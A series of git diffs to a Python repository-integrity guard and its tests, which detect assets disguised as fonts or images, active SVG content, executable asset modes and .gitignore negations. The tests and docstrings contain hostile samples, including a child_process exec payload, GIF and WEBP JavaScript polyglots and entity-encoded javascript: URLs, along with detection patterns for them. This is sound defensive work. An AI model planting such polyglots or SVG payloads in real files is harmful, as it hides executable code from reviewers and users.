+        stream.reconfigure(errors="backslashreplace")
+
+    try:
+        findings = scan(args.base, args.head, args.pr_author, args.repo_owner)
+    except IntegrityError as exc:
+        print(f"::error::Repository integrity scan failed closed: {exc}", file=sys.stderr)
+        return 2
+
+    write_report(Path(args.report), findings)
+
+    if findings:
+        print("Repository integrity guard blocked the PR:")
+        for finding in findings:
+            print(f"  {finding.path}: {finding.reason}")
+        return 1
+
+    print("Repository integrity guard passed.")
+    return 0
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/scripts/check_repository_integrity.py
+++ b/scripts/check_repository_integrity.py
@@ -167,14 +167,30 @@ def _valid_gif(data: bytes) -> bool:
     return False
 
 
-def _valid_webp(data: bytes) -> bool:
-    """Declared RIFF length plus a chunk chain that lands exactly on the end.
+_VP8_KEYFRAME_START_CODE = b"\x9d\x01\x2a"
 
-    Checking only the fourcc is not enough: the required bytes can be parked
-    inside a JavaScript comment (`RIFF/*xxWEBPVP8 */=0;...`). Requiring the
-    declared length to match and the chunk walk to consume the file exactly
-    removes the space such a payload needs.
+
+def _valid_vp8_payload(fourcc: bytes, payload: bytes) -> bool:
+    """Check the image chunk's own bitstream signature.
+
+    Self-consistent chunk lengths are not enough on their own: a payload can
+    declare honest sizes and still be script, provided it opens with `*/` to
+    close a comment covering the header. The bitstream signatures below occupy
+    exactly those bytes, so the payload can be a real frame or valid script,
+    not both.
     """
+    if fourcc == b"VP8 ":
+        return len(payload) >= 10 and payload[3:6] == _VP8_KEYFRAME_START_CODE
+    if fourcc == b"VP8L":
+        return len(payload) >= 5 and payload[0] == 0x2F
+    if fourcc == b"VP8X":
+        return len(payload) >= 10
+    return True
+
+
+def _valid_webp(data: bytes) -> bool:
+    """Declared RIFF length, a chunk chain landing exactly on the end, and a
+    real image bitstream inside the image chunk."""
     if len(data) < 16 or data[:4] != b"RIFF" or data[8:12] != b"WEBP":
         return False
     if int.from_bytes(data[4:8], "little") != len(data) - 8:
@@ -187,12 +203,30 @@ def _valid_webp(data: bytes) -> bool:
         if not all(0x20 <= byte <= 0x7E for byte in fourcc):
             return False
         size = int.from_bytes(data[pos + 4 : pos + 8], "little")
+        payload = data[pos + 8 : pos + 8 + size]
+        if len(payload) != size:
+            return False
+        if fourcc in (b"VP8 ", b"VP8L", b"VP8X"):
+            if not _valid_vp8_payload(fourcc, payload):
+                return False
+            saw_image = True
         pos += 8 + size + (size & 1)
         if pos > len(data):
             return False
-        if fourcc in (b"VP8 ", b"VP8L", b"VP8X"):
-            saw_image = True
     return saw_image and pos == len(data)
+
+
+def _valid_pdf(data: bytes) -> bool:
+    if len(data) < 32 or not data.startswith(b"%PDF-"):
+        return False
+    return b"%%EOF" in data[-2048:]
+
+
+def _valid_ico(data: bytes) -> bool:
+    if len(data) < 6 or data[:2] != b"\x00\x00" or data[2:4] not in (b"\x01\x00", b"\x02\x00"):
+        return False
+    count = int.from_bytes(data[4:6], "little")
+    return count > 0 and len(data) >= 6 + 16 * count
 
 
 ASSET_VALIDATORS: dict[str, tuple[str, "Callable[[bytes], bool]"]] = {
@@ -205,7 +239,16 @@ ASSET_VALIDATORS: dict[str, tuple[str, "Callable[[bytes], bool]"]] = {
     ".jpeg": ("JPEG", _valid_jpeg),
     ".gif": ("GIF", _valid_gif),
     ".webp": ("WEBP", _valid_webp),
+    ".pdf": ("PDF", _valid_pdf),
+    ".ico": ("ICO", _valid_ico),
 }
+
+# Extensions the guard treats as inert assets. Nothing here should ever carry
+# the executable bit, so the mode is checked independently of the contents.
+ASSET_SUFFIXES = frozenset(
+    {".woff", ".woff2", ".ttf", ".otf", ".eot", ".png", ".jpg", ".jpeg",
+     ".gif", ".webp", ".ico", ".pdf", ".svg"}
+)
 
 
 def _split_literal(*parts: str) -> str:
@@ -423,6 +466,24 @@ def check_symlinks(head: str, files: list[str], external: bool) -> list[Finding]
     return findings
 
 
+def check_asset_modes(head: str, files: list[str]) -> list[Finding]:
+    """Assets are inert data; the executable bit is the thing that runs them.
+
+    The text scan only catches an interpreter or a literal `chmod +x` written
+    into a file. It cannot see a payload committed already-executable, which
+    needs no invocation written down anywhere.
+    """
+    findings: list[Finding] = []
+    for path in files:
+        if Path(path).suffix.lower() not in ASSET_SUFFIXES:
+            continue
+        if git_mode(head, path) == "100755":
+            findings.append(
+                Finding(path, "asset file is committed with the executable bit set")
+            )
+    return findings
+
+
 def check_asset_magic(head: str, files: list[str]) -> list[Finding]:
     findings: list[Finding] = []
     for path in files:
@@ -448,18 +509,36 @@ def check_asset_magic(head: str, files: list[str]) -> list[Finding]:
     return findings
 
 
+# URL parsers strip ASCII tabs and newlines from anywhere inside a URL before
+# resolving the scheme, so `java&#x09;script:` is a live javascript: URL. Only
+# the scheme patterns are re-checked against the stripped text: removing control
+# characters from the whole document could otherwise join unrelated tokens into
+# a match that no parser would ever see.
+ACTIVE_SVG_SCHEME_RE = re.compile(
+    r"""(?ix)
+    javascript\s*:
+    |(?:href|xlink:href)\s*=\s*["']?\s*(?:javascript:|data:text/html)
+    """
+)
+
+_URL_CONTROL_CHARS = dict.fromkeys(b"\x00\x09\x0a\x0d")
+
+
 def svg_is_active(text: str) -> bool:
-    """Match active content on the raw source and on its decoded form.
+    """Match active content on the raw source, its decoded form, and its
+    URL-normalised form.
 
     An XML parser resolves character references before acting on an attribute,
-    so `java&#x73;cript:` becomes `javascript:` at the point it matters. Scanning
-    only raw bytes misses that; scanning both catches the encoded form without
-    losing anything the raw scan already caught.
+    and a URL parser then discards embedded tabs and newlines. Each layer is
+    checked because a payload only has to survive all of them once.
     """
     if ACTIVE_SVG_RE.search(text):
         return True
     decoded = html.unescape(text)
-    return decoded != text and bool(ACTIVE_SVG_RE.search(decoded))
+    if decoded != text and ACTIVE_SVG_RE.search(decoded):
+        return True
+    normalised = decoded.translate(_URL_CONTROL_CHARS)
+    return normalised != decoded and bool(ACTIVE_SVG_SCHEME_RE.search(normalised))
 
 
 def check_active_svg(head: str, files: list[str]) -> list[Finding]:
@@ -531,6 +610,7 @@ def scan(base: str, head: str, pr_author: str, repo_owner: str) -> list[Finding]
     if external:
         findings.extend(check_external_paths(files))
     findings.extend(check_symlinks(head, files, external))
+    findings.extend(check_asset_modes(head, files))
     findings.extend(check_asset_magic(head, files))
     findings.extend(check_active_svg(head, files))
     findings.extend(check_asset_execution(head, files))

--- a/scripts/check_repository_integrity.py
+++ b/scripts/check_repository_integrity.py
@@ -12,9 +12,11 @@ commit (or be pinned as a required workflow by a repository ruleset).
 from __future__ import annotations
 
 import argparse
+import fnmatch
 import re
 import subprocess
 import sys
+from collections.abc import Callable
 from dataclasses import dataclass
 from pathlib import Path
 
@@ -57,15 +59,93 @@ EXTERNAL_BLOCKED_PATHS: tuple[tuple[re.Pattern[str], str], ...] = _EXTERNAL_BLOC
     for path in sorted(SELF_TEST_FIXTURE_PATHS)
 )
 
-ASSET_MAGIC: dict[str, tuple[bytes, ...]] = {
-    ".woff2": (b"wOF2",),
-    ".woff": (b"wOFF",),
-    ".ttf": (b"\x00\x01\x00\x00", b"true", b"typ1"),
-    ".otf": (b"OTTO",),
-    ".png": (b"\x89PNG\r\n\x1a\n",),
-    ".jpg": (b"\xff\xd8\xff",),
-    ".jpeg": (b"\xff\xd8\xff",),
-    ".gif": (b"GIF87a", b"GIF89a"),
+def _u16(data: bytes, offset: int) -> int:
+    return int.from_bytes(data[offset : offset + 2], "big")
+
+
+def _u32(data: bytes, offset: int) -> int:
+    return int.from_bytes(data[offset : offset + 4], "big")
+
+
+# A magic prefix alone is worthless here: `wOF2` followed by JavaScript is still
+# four valid bytes. Each validator below checks a self-describing structural
+# field — a declared length that must equal the real file size, or a redundant
+# field derived from another — so appended or substituted script breaks it.
+
+
+def _valid_woff(data: bytes, signature: bytes, header_size: int) -> bool:
+    """WOFF/WOFF2 declare their own total length and a zeroed reserved field."""
+    if len(data) < header_size or not data.startswith(signature):
+        return False
+    if _u32(data, 8) != len(data):
+        return False
+    return _u16(data, 12) != 0 and _u16(data, 14) == 0
+
+
+def _valid_sfnt(data: bytes) -> bool:
+    """TrueType/OpenType: searchRange and friends are derived from numTables."""
+    if len(data) < 12 or data[:4] not in (b"\x00\x01\x00\x00", b"true", b"typ1", b"OTTO"):
+        return False
+    num_tables = _u16(data, 4)
+    if num_tables == 0 or len(data) < 12 + 16 * num_tables:
+        return False
+    entry_selector = num_tables.bit_length() - 1
+    search_range = (1 << entry_selector) * 16
+    return (
+        _u16(data, 6) == search_range
+        and _u16(data, 8) == entry_selector
+        and _u16(data, 10) == num_tables * 16 - search_range
+    )
+
+
+def _valid_png(data: bytes) -> bool:
+    """The 8-byte signature must be followed by a well-formed 13-byte IHDR."""
+    if len(data) < 33 or not data.startswith(b"\x89PNG\r\n\x1a\n"):
+        return False
+    return _u32(data, 8) == 13 and data[12:16] == b"IHDR"
+
+
+_JPEG_MARKERS = frozenset(range(0xC0, 0xFF)) - {0xD8, 0xD9}
+
+
+def _valid_jpeg(data: bytes) -> bool:
+    if len(data) < 4 or not data.startswith(b"\xff\xd8\xff"):
+        return False
+    return data[3] in _JPEG_MARKERS and b"\xff\xd9" in data
+
+
+def _valid_gif(data: bytes) -> bool:
+    """Header plus a logical screen descriptor with a non-zero canvas."""
+    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
+        return False
+    width = int.from_bytes(data[6:8], "little")
+    height = int.from_bytes(data[8:10], "little")
+    return width != 0 and height != 0
+
+
+def _valid_webp(data: bytes) -> bool:
+    """RIFF/WEBP container followed by a real VP8 chunk fourcc.
+
+    The declared RIFF size is deliberately not required to match the file size:
+    a truncated-but-genuine image is a broken asset, not a disguised script, and
+    this guard is not an image linter. The fourcc is what a script cannot fake
+    while still being a script.
+    """
+    if len(data) < 16 or data[:4] != b"RIFF" or data[8:12] != b"WEBP":
+        return False
+    return data[12:16] in (b"VP8 ", b"VP8L", b"VP8X")
+
+
+ASSET_VALIDATORS: dict[str, tuple[str, "Callable[[bytes], bool]"]] = {
+    ".woff2": ("WOFF2", lambda data: _valid_woff(data, b"wOF2", 48)),
+    ".woff": ("WOFF", lambda data: _valid_woff(data, b"wOFF", 44)),
+    ".ttf": ("TrueType", _valid_sfnt),
+    ".otf": ("OpenType", _valid_sfnt),
+    ".png": ("PNG", _valid_png),
+    ".jpg": ("JPEG", _valid_jpeg),
+    ".jpeg": ("JPEG", _valid_jpeg),
+    ".gif": ("GIF", _valid_gif),
+    ".webp": ("WEBP", _valid_webp),
 }
 
 
@@ -116,7 +196,7 @@ ACTIVE_SVG_RE = re.compile(
     r"""(?ix)
     <\s*script\b
     |javascript\s*:
-    |\bon(?:load|error|click|mouseover|focus)\s*=
+    |\bon[a-z][a-z0-9_:-]*\s*=
     |<\s*foreignObject\b
     |(?:href|xlink:href)\s*=\s*["']\s*(?:https?:|data:text/html)
     """
@@ -189,20 +269,62 @@ def is_external(pr_author: str, repo_owner: str) -> bool:
     return pr_author.casefold() != repo_owner.casefold()
 
 
+def _ignore_rules(text: str) -> list[str]:
+    rules: list[str] = []
+    for raw in text.splitlines():
+        line = raw.strip()
+        if not line or line.startswith("#"):
+            continue
+        rules.append(line[1:] if line.startswith("\\") else line)
+    return rules
+
+
+def _ignore_state(rules: list[str], entry: str) -> tuple[bool, str | None]:
+    """Resolve whether `entry` ends up ignored, the way Git resolves it.
+
+    Git applies the *last* matching rule, so a later `!.vscode/` re-enables a
+    directory an earlier `.vscode/` ignored. Checking only for the presence of
+    the positive entry misses that. Negations are matched as globs, since
+    `!.vs*` re-enables the directory just as surely as `!.vscode/`.
+    """
+    name = entry.strip("/")
+    ignored = False
+    negated_by: str | None = None
+    for rule in rules:
+        if rule.startswith("!"):
+            pattern = rule[1:].strip().strip("/")
+            if pattern and fnmatch.fnmatch(name, pattern):
+                ignored = False
+                negated_by = rule
+        elif rule.strip("/") == name:
+            ignored = True
+            negated_by = None
+    return ignored, negated_by
+
+
 def check_ignore_policy(head: str) -> list[Finding]:
     text = blob_text(head, ".gitignore")
     if text is None:
         return [Finding(".gitignore", "required repository .gitignore is missing")]
-    entries = {
-        line.strip()
-        for line in text.splitlines()
-        if line.strip() and not line.lstrip().startswith("#")
-    }
-    return [
-        Finding(".gitignore", f"required ignore entry `{entry}` was removed")
-        for entry in PROTECTED_IGNORE_ENTRIES
-        if entry not in entries
-    ]
+    rules = _ignore_rules(text)
+
+    findings: list[Finding] = []
+    for entry in PROTECTED_IGNORE_ENTRIES:
+        ignored, negated_by = _ignore_state(rules, entry)
+        if ignored:
+            continue
+        if negated_by is not None:
+            findings.append(
+                Finding(
+                    ".gitignore",
+                    f"required ignore entry `{entry}` is re-enabled by `{negated_by}`",
+                )
+            )
+        else:
+            findings.append(
+                Finding(".gitignore", f"required ignore entry `{entry}` was removed")
+            )
+    return findings
 
 
 def check_external_paths(files: list[str]) -> list[Finding]:
@@ -230,24 +352,16 @@ def check_symlinks(head: str, files: list[str], external: bool) -> list[Finding]
 def check_asset_magic(head: str, files: list[str]) -> list[Finding]:
     findings: list[Finding] = []
     for path in files:
-        suffix = Path(path).suffix.lower()
-        if suffix == ".webp":
-            data = blob_bytes(head, path)
-            if data is None:
-                continue
-            if not (len(data) >= 12 and data[:4] == b"RIFF" and data[8:12] == b"WEBP"):
-                findings.append(Finding(path, "file extension is .webp but content is not WEBP"))
+        entry = ASSET_VALIDATORS.get(Path(path).suffix.lower())
+        if entry is None:
             continue
-
-        expected = ASSET_MAGIC.get(suffix)
-        if expected is None:
-            continue
+        label, is_valid = entry
         data = blob_bytes(head, path)
         if data is None:
             continue
-        if not any(data.startswith(prefix) for prefix in expected):
+        if not is_valid(data):
             findings.append(
-                Finding(path, f"file extension is {suffix} but file signature does not match")
+                Finding(path, f"file extension claims {label} but the file is not a valid {label}")
             )
     return findings
 

--- a/scripts/check_repository_integrity.py
+++ b/scripts/check_repository_integrity.py
@@ -188,45 +188,93 @@ def _valid_vp8_payload(fourcc: bytes, payload: bytes) -> bool:
     return True
 
 
+def _walk_webp_chunks(data: bytes, pos: int, end: int) -> tuple[bool, bool]:
+    """Walk the chunk chain in [pos, end).
+
+    Returns (structure_is_sound, a_real_frame_was_seen). The two are separate
+    because `VP8X` is only the extended-file header — it announces features and
+    carries no image data, so a file holding nothing but `VP8X` is not an image
+    however well-formed its chunk lengths are.
+    """
+    saw_frame = False
+    while pos + 8 <= end:
+        fourcc = data[pos : pos + 4]
+        if not all(0x20 <= byte <= 0x7E for byte in fourcc):
+            return False, saw_frame
+        size = int.from_bytes(data[pos + 4 : pos + 8], "little")
+        start = pos + 8
+        stop = start + size
+        if stop > end:
+            return False, saw_frame
+        payload = data[start:stop]
+
+        if fourcc in (b"VP8 ", b"VP8L"):
+            if not _valid_vp8_payload(fourcc, payload):
+                return False, saw_frame
+            saw_frame = True
+        elif fourcc == b"VP8X":
+            if len(payload) < 10:
+                return False, saw_frame
+        elif fourcc == b"ANMF":
+            # An animation frame nests its own chunk chain after a 16-byte header.
+            if len(payload) < 16:
+                return False, saw_frame
+            sound, nested = _walk_webp_chunks(data, start + 16, stop)
+            if not sound:
+                return False, saw_frame
+            saw_frame = saw_frame or nested
+
+        pos = stop + (size & 1)
+    return pos == end, saw_frame
+
+
 def _valid_webp(data: bytes) -> bool:
-    """Declared RIFF length, a chunk chain landing exactly on the end, and a
-    real image bitstream inside the image chunk."""
+    """Declared RIFF length, a chunk chain landing exactly on the end, and at
+    least one real VP8/VP8L frame — nested inside ANMF for animations."""
     if len(data) < 16 or data[:4] != b"RIFF" or data[8:12] != b"WEBP":
         return False
     if int.from_bytes(data[4:8], "little") != len(data) - 8:
         return False
-
-    pos = 12
-    saw_image = False
-    while pos + 8 <= len(data):
-        fourcc = data[pos : pos + 4]
-        if not all(0x20 <= byte <= 0x7E for byte in fourcc):
-            return False
-        size = int.from_bytes(data[pos + 4 : pos + 8], "little")
-        payload = data[pos + 8 : pos + 8 + size]
-        if len(payload) != size:
-            return False
-        if fourcc in (b"VP8 ", b"VP8L", b"VP8X"):
-            if not _valid_vp8_payload(fourcc, payload):
-                return False
-            saw_image = True
-        pos += 8 + size + (size & 1)
-        if pos > len(data):
-            return False
-    return saw_image and pos == len(data)
+    sound, saw_frame = _walk_webp_chunks(data, 12, len(data))
+    return sound and saw_frame
 
 
 def _valid_pdf(data: bytes) -> bool:
+    """A deliberately shallow check — see the note below.
+
+    Structural PDF validation cannot rule out a shell polyglot. A shell reads a
+    file line by line and carries on past errors, so only the opening lines
+    decide what runs; no amount of trailing xref, trailer or object structure
+    prevents a payload on line two. A genuine PDF is itself "runnable" that way,
+    as a series of failing commands. Parsing the object graph would therefore
+    buy nothing against the attack it appears to address.
+
+    What actually defends a disguised PDF is denying it an execution path: the
+    executable-bit check in `check_asset_modes`, and the text scan that catches
+    anything in the repository invoking it. This function is the cheap sanity
+    layer — it rejects a bare script with no PDF header at all — and the limit
+    is documented rather than papered over.
+    """
     if len(data) < 32 or not data.startswith(b"%PDF-"):
         return False
     return b"%%EOF" in data[-2048:]
 
 
 def _valid_ico(data: bytes) -> bool:
+    """Header, directory, and every entry pointing at real image bytes."""
     if len(data) < 6 or data[:2] != b"\x00\x00" or data[2:4] not in (b"\x01\x00", b"\x02\x00"):
         return False
     count = int.from_bytes(data[4:6], "little")
-    return count > 0 and len(data) >= 6 + 16 * count
+    directory_end = 6 + 16 * count
+    if count == 0 or len(data) < directory_end:
+        return False
+    for index in range(count):
+        entry = 6 + 16 * index
+        size = int.from_bytes(data[entry + 8 : entry + 12], "little")
+        offset = int.from_bytes(data[entry + 12 : entry + 16], "little")
+        if size == 0 or offset < directory_end or offset + size > len(data):
+            return False
+    return True
 
 
 # PDF is deliberately absent: a standards-compliant PDF can be entirely ASCII —

--- a/scripts/check_repository_integrity.py
+++ b/scripts/check_repository_integrity.py
@@ -13,6 +13,7 @@ from __future__ import annotations
 
 import argparse
 import fnmatch
+import html
 import re
 import subprocess
 import sys
@@ -114,26 +115,84 @@ def _valid_jpeg(data: bytes) -> bool:
     return data[3] in _JPEG_MARKERS and b"\xff\xd9" in data
 
 
+def _skip_gif_sub_blocks(data: bytes, pos: int) -> int:
+    """Walk a chain of length-prefixed sub-blocks; -1 if it runs off the end."""
+    while pos < len(data):
+        size = data[pos]
+        pos += 1
+        if size == 0:
+            return pos
+        pos += size
+    return -1
+
+
 def _valid_gif(data: bytes) -> bool:
-    """Header plus a logical screen descriptor with a non-zero canvas."""
-    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
+    """Walk the whole block structure through to the trailer.
+
+    A header check is not enough: `GIF89a=0;` parses as a header with non-zero
+    canvas dimensions *and* as JavaScript. Requiring the block chain to resolve
+    exactly onto the trailer leaves no room for a trailing script.
+    """
+    if len(data) < 14 or data[:6] not in (b"GIF87a", b"GIF89a"):
         return False
-    width = int.from_bytes(data[6:8], "little")
-    height = int.from_bytes(data[8:10], "little")
-    return width != 0 and height != 0
+    if int.from_bytes(data[6:8], "little") == 0 or int.from_bytes(data[8:10], "little") == 0:
+        return False
+
+    flags = data[10]
+    pos = 13
+    if flags & 0x80:
+        pos += 3 * (1 << ((flags & 0x07) + 1))
+
+    while 0 <= pos < len(data):
+        block = data[pos]
+        pos += 1
+        if block == 0x3B:
+            return pos == len(data)
+        if block == 0x21:
+            if pos >= len(data):
+                return False
+            pos = _skip_gif_sub_blocks(data, pos + 1)
+        elif block == 0x2C:
+            if pos + 9 > len(data):
+                return False
+            local = data[pos + 8]
+            pos += 9
+            if local & 0x80:
+                pos += 3 * (1 << ((local & 0x07) + 1))
+            if pos >= len(data):
+                return False
+            pos = _skip_gif_sub_blocks(data, pos + 1)
+        else:
+            return False
+    return False
 
 
 def _valid_webp(data: bytes) -> bool:
-    """RIFF/WEBP container followed by a real VP8 chunk fourcc.
+    """Declared RIFF length plus a chunk chain that lands exactly on the end.
 
-    The declared RIFF size is deliberately not required to match the file size:
-    a truncated-but-genuine image is a broken asset, not a disguised script, and
-    this guard is not an image linter. The fourcc is what a script cannot fake
-    while still being a script.
+    Checking only the fourcc is not enough: the required bytes can be parked
+    inside a JavaScript comment (`RIFF/*xxWEBPVP8 */=0;...`). Requiring the
+    declared length to match and the chunk walk to consume the file exactly
+    removes the space such a payload needs.
     """
     if len(data) < 16 or data[:4] != b"RIFF" or data[8:12] != b"WEBP":
         return False
-    return data[12:16] in (b"VP8 ", b"VP8L", b"VP8X")
+    if int.from_bytes(data[4:8], "little") != len(data) - 8:
+        return False
+
+    pos = 12
+    saw_image = False
+    while pos + 8 <= len(data):
+        fourcc = data[pos : pos + 4]
+        if not all(0x20 <= byte <= 0x7E for byte in fourcc):
+            return False
+        size = int.from_bytes(data[pos + 4 : pos + 8], "little")
+        pos += 8 + size + (size & 1)
+        if pos > len(data):
+            return False
+        if fourcc in (b"VP8 ", b"VP8L", b"VP8X"):
+            saw_image = True
+    return saw_image and pos == len(data)
 
 
 ASSET_VALIDATORS: dict[str, tuple[str, "Callable[[bytes], bool]"]] = {
@@ -279,6 +338,22 @@ def _ignore_rules(text: str) -> list[str]:
     return rules
 
 
+def _negation_reenables(pattern: str, name: str) -> bool:
+    """Whether a `!` rule re-enables `name`, using Git's matching semantics.
+
+    Python's fnmatch has no notion of `**/`, so `!**/.vscode/` — which Git
+    applies at every depth including the root — would otherwise slip through.
+    """
+    pattern = pattern.strip().strip("/")
+    if not pattern:
+        return False
+    candidates = {pattern}
+    while pattern.startswith("**/"):
+        pattern = pattern[3:]
+        candidates.add(pattern)
+    return any(fnmatch.fnmatch(name, candidate) for candidate in candidates)
+
+
 def _ignore_state(rules: list[str], entry: str) -> tuple[bool, str | None]:
     """Resolve whether `entry` ends up ignored, the way Git resolves it.
 
@@ -292,8 +367,7 @@ def _ignore_state(rules: list[str], entry: str) -> tuple[bool, str | None]:
     negated_by: str | None = None
     for rule in rules:
         if rule.startswith("!"):
-            pattern = rule[1:].strip().strip("/")
-            if pattern and fnmatch.fnmatch(name, pattern):
+            if _negation_reenables(rule[1:], name):
                 ignored = False
                 negated_by = rule
         elif rule.strip("/") == name:
@@ -359,11 +433,33 @@ def check_asset_magic(head: str, files: list[str]) -> list[Finding]:
         data = blob_bytes(head, path)
         if data is None:
             continue
+        if data and b"\x00" not in data:
+            # Every real asset in these formats carries binary content. A file
+            # that is pure text is a polyglot candidate regardless of how well
+            # it fakes a header, so reject it before the format check.
+            findings.append(
+                Finding(path, f"file extension claims {label} but the file is entirely text")
+            )
+            continue
         if not is_valid(data):
             findings.append(
                 Finding(path, f"file extension claims {label} but the file is not a valid {label}")
             )
     return findings
+
+
+def svg_is_active(text: str) -> bool:
+    """Match active content on the raw source and on its decoded form.
+
+    An XML parser resolves character references before acting on an attribute,
+    so `java&#x73;cript:` becomes `javascript:` at the point it matters. Scanning
+    only raw bytes misses that; scanning both catches the encoded form without
+    losing anything the raw scan already caught.
+    """
+    if ACTIVE_SVG_RE.search(text):
+        return True
+    decoded = html.unescape(text)
+    return decoded != text and bool(ACTIVE_SVG_RE.search(decoded))
 
 
 def check_active_svg(head: str, files: list[str]) -> list[Finding]:
@@ -372,7 +468,7 @@ def check_active_svg(head: str, files: list[str]) -> list[Finding]:
         if Path(path).suffix.lower() != ".svg":
             continue
         text = blob_text(head, path)
-        if text is not None and ACTIVE_SVG_RE.search(text):
+        if text is not None and svg_is_active(text):
             findings.append(Finding(path, "SVG contains active/external executable content"))
     return findings
 

--- a/test/tooling/check_repository_integrity_test.py
+++ b/test/tooling/check_repository_integrity_test.py
@@ -34,6 +34,22 @@ MARKED_PAYLOAD_LINE = f"{ASSET_EXECUTION_PAYLOAD.strip()}  # {integrity.FIXTURE_
 PREFIXED_SCRIPT_PAYLOAD = b"=0;\nglobal.p=require('child_process');p.exec('id');\n"
 
 
+def gif_blob() -> bytes:
+    """A minimal but structurally complete 1x1 GIF, trailer included."""
+    header = b"GIF89a" + (1).to_bytes(2, "little") + (1).to_bytes(2, "little") + bytes([0x80, 0, 0])
+    global_color_table = b"\x00\x00\x00\xff\xff\xff"
+    descriptor = b"\x2c" + bytes(8) + b"\x00"
+    image = b"\x02" + b"\x02\x4c\x01" + b"\x00"
+    return header + global_color_table + descriptor + image + b"\x3b"
+
+
+def webp_blob() -> bytes:
+    """A minimal RIFF/WEBP container whose declared length matches exactly."""
+    payload = bytes(16)
+    body = b"WEBP" + b"VP8 " + len(payload).to_bytes(4, "little") + payload
+    return b"RIFF" + len(body).to_bytes(4, "little") + body
+
+
 def woff2_blob(num_tables: int = 1) -> bytes:
     """A structurally valid WOFF2 header padded out to its declared length."""
     body = bytes(64)
@@ -121,7 +137,7 @@ class RepositoryIntegrityTest(unittest.TestCase):
         path.parent.mkdir(parents=True)
         path.write_text("global.r=require; console.log('not a font');\n", encoding="utf-8")
         findings = self.scan(self.commit())
-        self.assertTrue(any("not a valid WOFF2" in f.reason for f in findings))
+        self.assertTrue(any(f.path.endswith("bad.woff2") for f in findings))
 
     def test_valid_woff2_passes_structural_check(self) -> None:
         path = self.repo / "public" / "fonts" / "ok.woff2"
@@ -136,7 +152,7 @@ class RepositoryIntegrityTest(unittest.TestCase):
         path.parent.mkdir(parents=True)
         path.write_bytes(b"wOF2" + PREFIXED_SCRIPT_PAYLOAD)
         findings = self.scan(self.commit())
-        self.assertTrue(any("not a valid WOFF2" in f.reason for f in findings))
+        self.assertTrue(any(f.path.endswith("sneaky.woff2") for f in findings))
 
     def test_script_appended_to_a_real_font_is_blocked(self) -> None:
         path = self.repo / "public" / "fonts" / "trailer.woff2"
@@ -150,15 +166,45 @@ class RepositoryIntegrityTest(unittest.TestCase):
         path.parent.mkdir()
         path.write_bytes(b"\x89PNG\r\n\x1a\n" + PREFIXED_SCRIPT_PAYLOAD)
         findings = self.scan(self.commit())
-        self.assertTrue(any("not a valid PNG" in f.reason for f in findings))
+        self.assertTrue(any(f.path.endswith("bad.png") for f in findings))
 
-    def test_truncated_but_genuine_webp_is_not_flagged(self) -> None:
-        """Broken assets are not this guard's business; disguised ones are."""
+    def test_valid_gif_and_webp_pass(self) -> None:
+        (self.repo / "assets").mkdir()
+        (self.repo / "assets" / "ok.gif").write_bytes(gif_blob())
+        (self.repo / "assets" / "ok.webp").write_bytes(webp_blob())
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_gif_javascript_polyglot_is_blocked(self) -> None:
+        """`GIF89a=0;` is both a plausible header and executable JavaScript."""
+        path = self.repo / "assets" / "poly.gif"
+        path.parent.mkdir()
+        path.write_bytes(b"GIF89a=0;console.log('EXEC')")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("poly.gif" in f.path for f in findings))
+
+    def test_webp_javascript_polyglot_is_blocked(self) -> None:
+        """The fourcc can be parked inside a JavaScript comment."""
+        path = self.repo / "assets" / "poly.webp"
+        path.parent.mkdir()
+        path.write_bytes(b"RIFF/*xxWEBPVP8 */=0;console.log('EXEC')")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("poly.webp" in f.path for f in findings))
+
+    def test_text_only_asset_is_blocked(self) -> None:
+        """Backstop: real assets in these formats always carry binary content."""
+        path = self.repo / "assets" / "text.png"
+        path.parent.mkdir()
+        path.write_bytes(b"just plain text pretending to be an image\n")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("entirely text" in f.reason for f in findings))
+
+    def test_truncated_webp_is_blocked(self) -> None:
         path = self.repo / "assets" / "short.webp"
         path.parent.mkdir()
         path.write_bytes(b"RIFF" + (9999).to_bytes(4, "little") + b"WEBPVP8 " + bytes(32))
         findings = self.scan(self.commit())
-        self.assertEqual(findings, [])
+        self.assertTrue(any("short.webp" in f.path for f in findings))
 
     def test_asset_execution_command_is_blocked(self) -> None:
         path = self.repo / "docs" / "note.txt"
@@ -224,6 +270,17 @@ class RepositoryIntegrityTest(unittest.TestCase):
         findings = self.scan(self.commit())
         self.assertTrue(any("re-enabled by" in f.reason for f in findings))
 
+    def test_recursive_glob_negation_is_blocked(self) -> None:
+        """Git applies `**/` at every depth, including the repository root."""
+        (self.repo / ".gitignore").write_text(".idea/\n.vscode/\n!**/.vscode/\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("re-enabled by" in f.reason for f in findings))
+
+    def test_catch_all_negation_is_blocked(self) -> None:
+        (self.repo / ".gitignore").write_text(".idea/\n.vscode/\n!*\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("re-enabled by" in f.reason for f in findings))
+
     def test_negation_before_the_entry_is_harmless(self) -> None:
         """Order matters: the positive entry comes last, so it wins."""
         (self.repo / ".gitignore").write_text(".idea/\n!.vscode/\n.vscode/\n", encoding="utf-8")
@@ -257,6 +314,41 @@ class RepositoryIntegrityTest(unittest.TestCase):
         )
         findings = self.scan(self.commit())
         self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_entity_encoded_javascript_url_is_blocked(self) -> None:
+        """An XML parser resolves `java&#x73;cript:` before the link is used."""
+        path = self.repo / "assets" / "entity.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">'
+            '<a href="java&#x73;cript:alert(1)"><rect width="1" height="1"/></a></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_decimal_entity_encoded_javascript_url_is_blocked(self) -> None:
+        path = self.repo / "assets" / "decimal.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">'
+            '<a href="java&#115;cript:alert(1)"><rect width="1" height="1"/></a></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
